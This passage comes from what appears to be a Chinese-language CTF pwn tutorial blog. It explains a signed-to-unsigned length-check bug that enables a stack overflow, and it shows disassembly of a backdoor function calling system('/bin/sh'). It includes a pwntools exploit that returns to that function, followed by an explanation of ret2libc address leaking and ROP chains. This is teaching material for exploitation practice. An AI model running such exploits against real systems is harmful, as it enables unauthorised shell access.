stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span 
class=\"line\"><span style=\"color: #D8DEE9FF\">__int64 <\/span><span style=\"color: #88C0D0\">backdoor<\/span><span style=\"color: #ECEFF4\">()<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #ECEFF4\">{<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #88C0D0\">system<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">\/bin\/sh<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #81A1C1\">;<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #81A1C1\">return<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #B48EAD\">1<\/span><span style=\"color: #81A1C1\">LL;<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #ECEFF4\">}<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>我们需要先输入一个<code>int<\/code>类型的<code>nbytes<\/code>，并且要满足<code>nbytes&lt;=10<\/code>（程序的检查是<code>(int)nbytes &gt; 10<\/code>就退出），再输入对应长度的字符串<code>buf<\/code>（<code>read<\/code>最多只读<code>nbytes<\/code>个字节，超出的部分不会被读入；若<code>nbytes<\/code>为符合条件的正数，最多只能写10个字节，连12字节的<code>buf<\/code>都填不满，我们并不能通过<code>buf<\/code>来利用栈溢出漏洞），但是问题在于<code>read(0, buf, (unsigned int)nbytes);<\/code>处：长度检查是按有符号的<code>int<\/code>做的，而传给<code>read<\/code>时<code>nbytes<\/code>会被转换成<code>unsigned 
int<\/code>。这里严格来说不是“溢出”，而是有符号\/无符号转换问题：输入-1（任意负数都可以）能通过<code>-1 &gt; 10<\/code>为假的检查，转换成<code>unsigned int<\/code>后却变成0xFFFFFFFF，<code>read<\/code>的长度上限实际上被解除了（<code>read<\/code>有多少数据就读多少并返回，不必凑满这个长度），从而达到通过<code>buf<\/code>实现栈溢出的效果。这种“用有符号数做长度检查、再当无符号长度使用”的模式在代码审计中非常值得留意。<br>查看汇编：<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>.text:0000000000400726                 public backdoor\n.text:0000000000400726 backdoor        proc near\n.text:0000000000400726 ; __unwind {\n.text:0000000000400726                 push    rbp\n.text:0000000000400727                 mov     rbp, rsp\n.text:000000000040072A                 mov     edi, offset command ; \"\/bin\/sh\"\n.text:000000000040072F                 call    
_system\n.text:0000000000400734                 mov     eax, 1\n.text:0000000000400739                 pop     rbp\n.text:000000000040073A                 retn\n.text:000000000040073A ; } \/\/ starts at 400726\n.text:000000000040073A backdoor        endp<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #D8DEE9FF\">.text:<\/span><span style=\"color: #B48EAD\">0000000000400726<\/span><span style=\"color: #D8DEE9FF\">                 public backdoor<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">.text:<\/span><span style=\"color: #B48EAD\">0000000000400726<\/span><span style=\"color: #D8DEE9FF\"> backdoor        proc <\/span><span style=\"color: #81A1C1\">near<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">.text:<\/span><span style=\"color: #B48EAD\">0000000000400726<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #616E88\">; __unwind {<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">.text:<\/span><span style=\"color: #B48EAD\">0000000000400726<\/span><span style=\"color: #D8DEE9FF\">                 <\/span><span style=\"color: #81A1C1\">push<\/span><span style=\"color: #D8DEE9FF\">    <\/span><span style=\"color: #81A1C1\">rbp<\/span><\/span>\n<span 
class=\"line\"><span style=\"color: #D8DEE9FF\">.text:<\/span><span style=\"color: #B48EAD\">0000000000400727<\/span><span style=\"color: #D8DEE9FF\">                 <\/span><span style=\"color: #81A1C1\">mov<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">rbp<\/span><span style=\"color: #D8DEE9FF\">, <\/span><span style=\"color: #81A1C1\">rsp<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">.text:000000000040072A                 <\/span><span style=\"color: #81A1C1\">mov<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">edi<\/span><span style=\"color: #D8DEE9FF\">, offset command <\/span><span style=\"color: #616E88\">; &quot;\/bin\/sh&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">.text:000000000040072F                 <\/span><span style=\"color: #81A1C1\">call<\/span><span style=\"color: #D8DEE9FF\">    _system<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">.text:<\/span><span style=\"color: #B48EAD\">0000000000400734<\/span><span style=\"color: #D8DEE9FF\">                 <\/span><span style=\"color: #81A1C1\">mov<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">eax<\/span><span style=\"color: #D8DEE9FF\">, <\/span><span style=\"color: #B48EAD\">1<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">.text:<\/span><span style=\"color: #B48EAD\">0000000000400739<\/span><span style=\"color: #D8DEE9FF\">                 <\/span><span style=\"color: #81A1C1\">pop<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">rbp<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">.text:000000000040073A                 <\/span><span style=\"color: #81A1C1\">retn<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">.text:000000000040073A <\/span><span style=\"color: #616E88\">; } \/\/ starts at 
400726<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">.text:000000000040073A backdoor        endp<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>\u770b\u5230<code>backdoor<\/code>\u51fd\u6570\u7684\u8d77\u59cb\u5730\u5740\u4e3a0x400726\uff0c\u53ef\u4ee5\u5199\u51fa\u4ee3\u7801\u5982\u4e0b\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>from pwn import *\n\nio = remote(\"ip\", port)\nio.recvuntil(b\"name:\")\npayload = b'-1'\nio.sendline(payload)\nio.recvuntil(b\"name?\")\npayload = b'a' * 0x18 + p64(0x400726)\nio.sendline(payload)\nio.interactive()<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" 
stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #81A1C1\">from<\/span><span style=\"color: #D8DEE9FF\"> pwn <\/span><span style=\"color: #81A1C1\">import<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">io <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">remote<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">ip<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> port<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">io<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">recvuntil<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">name:<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: 
#A3BE8C\">-1<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">io<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">sendline<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">payload<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">io<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">recvuntil<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">name?<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">a<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">18<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">400726<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">io<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">sendline<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">payload<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: 
#D8DEE9FF\">io<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">interactive<\/span><span style=\"color: #ECEFF4\">()<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<h2 class=\"wp-block-heading\">ret2libc<\/h2>\n\n\n\n<p>ret2libc \u5373\u63a7\u5236\u52a8\u6001\u94fe\u63a5\u7f16\u8bd1\u7684\u7a0b\u5e8f\u6267\u884c libc \u4e2d\u7684\u51fd\u6570\uff0c\u901a\u5e38\u662f\u8fd4\u56de\u81f3\u67d0\u4e2a\u51fd\u6570\uff08\u901a\u5e38\u662f<code>puts<\/code>\u51fd\u6570\uff09\u7684 plt \u8868\u5730\u5740\u6216\u8005\u51fd\u6570\u7684\u5177\u4f53\u4f4d\u7f6e (\u5373\u51fd\u6570\u5bf9\u5e94\u7684 got \u8868\u9879\u7684\u5185\u5bb9)\uff0c\u4e00\u822c\u60c5\u51b5\u4e0b\u4f1a\u9009\u62e9\u52ab\u6301\u7a0b\u5e8f\u6267\u884c <code>system(\"\/bin\/sh\")<\/code>\uff0c\u6545\u800c\u6b64\u65f6\u6211\u4eec\u9700\u8981\u77e5\u9053 <code>system<\/code>\u51fd\u6570\u7684\u5730\u5740\u548c<code>\/bin\/sh<\/code>\u7684\u5730\u5740\u3002<br>\u5728Linux\u4e0b\uff0c\u52a8\u6001\u94fe\u63a5\u662f\u901a\u8fc7plt\u548cgot\u6765\u5b9e\u73b0\u7684\uff0c\u8c03\u7528\u52a8\u6001\u94fe\u63a5\u51fd\u6570\u65f6\u4f1a\u5148\u53bbplt\u8868\u548cgot\u8868\u4e2d\u5bfb\u627e\u8be5\u51fd\u6570\u7684\u771f\u5b9e\u5730\u5740\uff0cplt\u8868\u4f1a\u6307\u5411got\u8868\u4e2d\u7684\u5730\u5740\uff0cgot\u8868\u6307\u5411libc\u4e2d\u7684\u5730\u5740\uff0c\u6240\u4ee5\u5728\u7a0b\u5e8f\u8fd0\u884c\u65f6\uff1a<strong>got\u8868\u4f1a\u5305\u542b\u51fd\u6570\u7684\u771f\u5b9e\u5730\u5740\uff08\u5373libc\u57fa\u5740+\u51fd\u6570\u76f8\u5bf9libc\u7684\u504f\u79fb\uff09<\/strong>\uff0c\u800c\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7plt\u8868\u6765\u76f4\u63a5\u8c03\u7528\u51fd\u6570\u3002<\/p>\n\n\n\n<p>\u5229\u7528ret2libc\u52ab\u6301\u7a0b\u5e8f\u4e00\u822c\u6709\u4e00\u4e2a\u6ea2\u51fa\u70b9\uff0c\u8981\u8fdb\u884c\u4e24\u6b21\u52ab\u6301\uff1a<\/p>\n\n\n\n<ol 
class=\"wp-block-list\">\n<li>\u7b2c\u4e00\u6b21\u52ab\u6301\uff1a\u8981\u52ab\u6301\u7a0b\u5e8f\u6cc4\u9732\u51fa\u67d0\u4e2a\u51fd\u6570\u7684\u5730\u5740\uff08\u4f8b\u5982<code>puts<\/code>,<code>write<\/code>\u7b49\uff09\uff0c\u4ece\u800c\u8ba1\u7b97\u51falibc\u7684\u57fa\u5740<\/li>\n\n\n\n<li>\u7b2c\u4e8c\u6b21\u52ab\u6301\uff1a\u63a7\u5236\u7a0b\u5e8f\u901a\u8fc7\u4e0a\u9762\u83b7\u5f97\u7684libc\u57fa\u5740\uff0c\u901a\u8fc7libc\u4e2d<code>system<\/code>\u51fd\u6570\u4ee5\u53ca<code>\/bin\/sh<\/code>\u7684\u504f\u79fb\u6765\u6267\u884c<code>system(\"\/bin\/sh\")<\/code>\u6765\u83b7\u5f97shell<\/li>\n<\/ol>\n\n\n\n<p>\u5728\u7b2c\u4e00\u6b21\u52ab\u6301\u4e2d\uff0c\u6211\u4eec\u4e00\u822c\u8981\u6784\u9020\u51fa\u901a\u8fc7\u8f93\u51fa\u51fd\u6570\uff08\u4f8b\u5982<code>puts<\/code>,<code>write<\/code>,<code>printf<\/code>\uff09\u6765\u8f93\u51fa\u5f85\u6cc4\u9732\u51fd\u6570\u7684\u771f\u5b9e\u5730\u5740\uff0c\u4ece\u800c\u8ba1\u7b97\u51falibc\u7684\u57fa\u5740\uff0c\u8ba1\u7b97\u65b9\u6cd5\u4e3a\uff1a<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>lib\u57fa\u5740=\u51fd\u6570\u771f\u5b9e\u5730\u5740-\u8be5\u51fd\u6570\u76f8\u5bf9libc\u57fa\u5740\u7684\u504f\u79fb\u91cf\uff08\u5373\u8be5\u51fd\u6570\u5728libc\u4e2d\u7684\u5730\u5740\uff09<\/p>\n<\/blockquote>\n\n\n\n<p>\u4e0b\u9762\u4ee564\u4f4d\u7a0b\u5e8f\u4e3a\u57fa\u7840\uff0c\u5bf9\u901a\u8fc7<code>puts<\/code>\u51fd\u6570\u548c<code>write<\/code>\u51fd\u6570\u8fdb\u884c\u51fd\u6570\u771f\u5b9e\u5730\u5740\u6cc4\u9732\u8fdb\u884c\u8bb2\u89e3\uff1a<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><code>puts<\/code>\u51fd\u6570<\/h3>\n\n\n\n<p><code>puts<\/code>\u51fd\u6570\u53ea\u6709\u4e00\u4e2a\u53c2\u6570\uff0c\u8fd9\u4e2a\u53c2\u6570\u6240\u4f7f\u7528\u7684\u5bc4\u5b58\u5668\u4e3a<code>rdi<\/code>\u5bc4\u5b58\u5668\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a 
href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-18.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-18.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"253\" height=\"63\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-18.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-151\"\/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u4e3a\u4f7f\u7528<code>puts<\/code>\u51fd\u6570\u65f6\uff0c\u6211\u4eec\u53ea\u9700\u8981\u901a\u8fc7<code>pop rdi<\/code>\u5c06\u53c2\u6570\u4ece\u6808\u9876\u5f39\u51fa\u5230<code>rdi<\/code>\u5bc4\u5b58\u5668\u4e2d\u518d\u8c03\u7528<code>puts<\/code>\u51fd\u6570\u8fdb\u884c\u8f93\u51fa\u5373\u53ef\uff0c\u5728ret2libc\u4e2d\uff0c\u6211\u4eec\u4e00\u822c\u4f1a\u5728\u6808\u6ea2\u51fa\u540e\u6784\u9020\u5982\u4e0brop\u94fe\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" 
stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>pop_rdi\u2192\u76ee\u6807\u51fd\u6570\u7684got\u8868\u5730\u5740\u2192puts\u7684plt\u8868\u5730\u5740\u2192\u8981\u56de\u5230\u7684\u51fd\u6570\u5730\u5740\uff08\u4e00\u822c\u662fmain\u51fd\u6570\uff09<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #d8dee9ff\">pop_rdi\u2192\u76ee\u6807\u51fd\u6570\u7684got\u8868\u5730\u5740\u2192puts\u7684plt\u8868\u5730\u5740\u2192\u8981\u56de\u5230\u7684\u51fd\u6570\u5730\u5740\uff08\u4e00\u822c\u662fmain\u51fd\u6570\uff09<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u6ce8\uff1a<code>pop 
rdi<\/code>\u4e00\u822c\u4f1a\u5b58\u5728\u4e8e<code>__libc_csu_init<\/code>\u4e4b\u4e2d\uff0c\u4e3a<code>pop r15<\/code>\uff08<code>41 5F<\/code>\uff09\u7684\u540e\u534a\u90e8\u5206\uff08<code>5F<\/code>\uff09<\/p>\n<\/blockquote>\n\n\n\n<p>\u8fd9\u6837\u4e4b\u540e\uff0c\u6211\u4eec\u5c31\u53ef\u4ee5\u8bfb\u53d6\u5230\u76ee\u6807\u51fd\u6570\u7684\u771f\u5b9e\u5730\u5740\uff0c\u800c\u572864\u4f4d\u7a0b\u5e8f\u4e2d\uff0c\u76ee\u6807\u51fd\u6570\u771f\u5b9e\u5730\u5740\u4e00\u822c\u7531<code>7f<\/code>\u5f00\u5934\u4e14\u53608\u4e2a\u5b57\u8282\uff0c\u800c\u572832\u4f4d\u7a0b\u5e8f\u4e2d\uff0c\u76ee\u6807\u51fd\u6570\u7684\u771f\u5b9e\u5730\u5740\u4e00\u822c\u4ee5<code>f7<\/code>\u5f00\u5934\u4e14\u53604\u4e2a\u5b57\u8282\uff0c\u90a3\u4e48\u5728\u672c\u9898\u4e2d\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u4e0b\u9762\u8fd9\u6761\u8bed\u53e5\u6765\u8bfb\u51fa\u51fd\u6570\u7684\u771f\u5b9e\u5730\u5740\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre 
class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>u64(p.recvuntil(b'\\x7f')&#91;-6:&#93;.ljust(8, b'\\x00')) <\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" 